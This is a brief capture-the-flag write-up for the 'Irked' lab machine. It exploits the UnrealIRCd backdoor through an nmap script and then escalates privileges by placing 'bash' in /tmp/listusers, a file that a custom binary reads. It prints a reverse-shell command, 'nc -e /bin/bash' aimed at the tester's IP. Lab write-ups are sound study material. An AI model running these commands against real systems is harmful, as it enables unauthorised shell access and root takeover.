Irked

UnrealIRCd Backdoor exploitation - Custom binary manipulation PrivEsc

Starting off with the nmap scan

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.117

Ports 22 and 111 running OpenSSH 6.7p1 and rpcbind 2–4 don’t look promising
Ports 6697, 8067 & 65534 are running UnrealIRCd - A version of this service was vulnerable to a backdoor command execution

nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117

Port 8067 is vulnerable!

nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.6 4444"  10.10.10.117

and we get a reverse shell on our listener !

Running the binary gives us an error message

The script is searching /tmp/listusers, we can easily manipulate the script by invoking bash as the /tmp/listusers

echo "bash" > /tmp/listusers

Last updated 1 year ago